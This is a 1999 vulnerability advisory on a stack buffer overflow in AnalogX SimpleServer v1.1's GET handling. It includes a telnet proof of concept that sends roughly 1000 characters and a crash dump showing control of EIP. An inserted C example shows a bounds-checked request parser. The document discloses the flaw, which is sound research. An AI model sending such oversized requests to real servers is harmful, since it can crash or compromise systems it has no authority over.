Subject [w00giving '99 #18] AnalogX SimpleServer v1.1 web server

Release Date: December 31, 1999
Systems Affected:
AnalogX SimpleServer v1.1 web server for Win9x, and possibly other
versions

About The Software:
This is a simple web server meant to be used by anyone.  It is one of a
series of powerful tools.

THE PROBLEM

The code that handles GET commands has an unchecked buffer that will allow
arbitrary code to be executed if it is overflowed.
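The defensive counterpart to the bug described above, added here as an illustration and not taken from SimpleServer: a GET request-line parser that checks the length of the request target against the destination buffer before copying, so an oversized target is rejected with a status instead of overwriting the stack. The limits, names and status codes are assumptions for the example.

```c
#include <stddef.h>
#include <string.h>

/* Constructed example, not SimpleServer's code; limits are assumptions. */
#define MAX_REQUEST_LINE 512   /* longest request line we are willing to read */

enum req_status { REQ_OK = 0, REQ_TOO_LONG = 1, REQ_BAD_SYNTAX = 2 };

/* Copy the request target from "GET <target> HTTP/1.x" into a fixed-size
 * buffer of target_cap bytes. Every copy is bounded, so the ~1000-byte
 * target from the advisory is refused rather than written past the buffer. */
int parse_get_request_line(const char *line, char *target, size_t target_cap)
{
    /* Look for the terminator within the limit; an overlong or unterminated
     * line is rejected before anything is parsed or copied. */
    const char *nul = memchr(line, '\0', MAX_REQUEST_LINE + 1);
    if (nul == NULL)
        return REQ_TOO_LONG;

    if (strncmp(line, "GET ", 4) != 0)
        return REQ_BAD_SYNTAX;
    const char *start = line + 4;
    const char *end = strchr(start, ' ');   /* target ends at the next space */
    if (end == NULL || end == start)
        return REQ_BAD_SYNTAX;

    size_t tlen = (size_t)(end - start);
    /* The check the vulnerable handler lacked: fit in the buffer, plus NUL. */
    if (tlen + 1 > target_cap)
        return REQ_TOO_LONG;

    memcpy(target, start, tlen);
    target[tlen] = '\0';
    return REQ_OK;
}

/* Map a parse result to the HTTP status a server would answer with. */
int http_status_for(int status)
{
    switch (status) {
    case REQ_OK:       return 200;
    case REQ_TOO_LONG: return 414;   /* Request-URI Too Long */
    default:           return 400;   /* Bad Request */
    }
}
```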

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another
contribution to w00giving for all you w00nderful people out there. You do
know what w00giving is don't you? http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>

[buffer] = approx. 1000 characters

This is what you would see on the remote (attacked) machine:
HTTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
41414141 00af02f0 

Binary or source for this exploit: 
http://www.ussrback.com/

Vendor Status: Contacted
Program URL:
http://www.analogx.com/contents/download/network/sswww.htm

SOLUTION
Wait for the vendor to release a patch

Greetings:
eEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock
Tellier, Technotronic and Wiretrip

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com